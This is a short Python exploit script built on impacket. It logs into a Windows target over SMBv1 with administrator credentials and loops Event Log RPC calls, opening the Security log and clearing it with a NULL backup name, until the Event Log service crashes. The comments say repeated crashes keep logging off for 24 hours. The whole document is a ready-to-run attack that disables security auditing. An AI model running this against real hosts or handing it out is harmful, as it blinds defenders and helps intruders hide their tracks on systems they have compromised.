Crash the Windows Event Log service remotely (needs admin privs)

eventvwr_crash.py

# Crash the Windows Event Log Service remotely, needs Admin privs
# originally discovered by limbenjamin and accidently re-discovered by @byt3bl33d3r
#
# Once the service crashes 3 times it will not restart for 24 hours
#
# https://github.com/limbenjamin/LogServiceCrash
# https://limbenjamin.com/articles/crash-windows-event-logging-service.html
#
# Needs the impacket library (https://github.com/SecureAuthCorp/impacket)

from impacket.dcerpc.v5 import transport, even
from impacket.smbconnection import SMBConnection, SessionError
from impacket.smb import SMB_DIALECT
from impacket.dcerpc.v5.dtypes import NULL

host = "target_ip"
username = "Administrator"
password = "password"

while True:
    # We're using an SMBv1 connection so you can see the un-encrypted traffic if you so desire
    conn = SMBConnection(host, host, None, 445, preferredDialect=SMB_DIALECT)
    conn.login(username, password)

    rpctransport = transport.SMBTransport(host, host, filename='/eventlog', smb_connection=conn)

    try:
        dce = rpctransport.get_dce_rpc()
        dce.connect()
        dce.bind(even.MSRPC_UUID_EVEN, transfer_syntax = ('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))
    except SessionError:
        print("Event log go boom!")
        break

    try:

        resp = even.hElfrOpenELW(dce, 'Security', '')
        resp.dump()

        # Calling ElfrClearELFW with a handle from ElfrOpenELW and specifying NULL as the BackupFileName seems to be what triggers the bug
        resp = even.hElfrClearELFW(
            dce,
            resp['LogHandle'],
            NULL
        )

        resp.dump()
    except SessionError:
        pass